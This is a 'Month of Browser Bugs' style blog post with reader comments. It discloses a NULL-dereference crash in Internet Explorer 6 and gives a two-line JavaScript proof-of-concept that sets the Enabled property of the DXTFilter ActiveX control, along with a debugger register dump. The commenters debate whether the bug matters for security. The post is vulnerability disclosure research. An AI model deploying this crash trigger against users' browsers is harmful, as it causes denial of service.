MoBB #10: DXTFilter Enabled
The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. By setting the 'Enabled' property of this control to a true value, we can trigger a NULL dereference.
var a = new ActiveXObject('Object.Microsoft.DXTFilter');
a.Enabled = 1;
Demonstration
eax=00000000 ebx=6bdd4728 ecx=00001008
edx=001bffff esi=02910488 edi=00000000
eip=6bde8881 esp=0013b250 ebp=0013b258
dxtrans!CDXTFilter::put_Enabled+0x75:
6bde8881 8b08 mov ecx,[eax] ds:0023:00000000=????????
This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE Object.Microsoft.DXTFilter Enabled Property NULL Dereference
posted by hdm @ 11:38 PM
5 comments
links to this post
5 Comments:
You probably have different reasons for posting this great stuff on a daily basis, but could you address the bug ramifications from a security point-of-view. I.e., remote code execution, denial of service, steals your online viagra orders.... etc..
The description of the bug usually describes the impact. Bugs that result in a NULL dereference are usually non-exploitable in terms of code execution.
Well until skape releases his research..............
This flaw is not dangerous because you have to click on the information bar in order to install/execute an activex.
I get an "Automation server cannot create object" script error, but IE6 continues running. The buggy ActiveX control probably comes with some other piece of MS software, like Office 2K3 or something.
IE7 doesn't crash either.
Post a Comment
Links to this post:
Create a Link
<< Home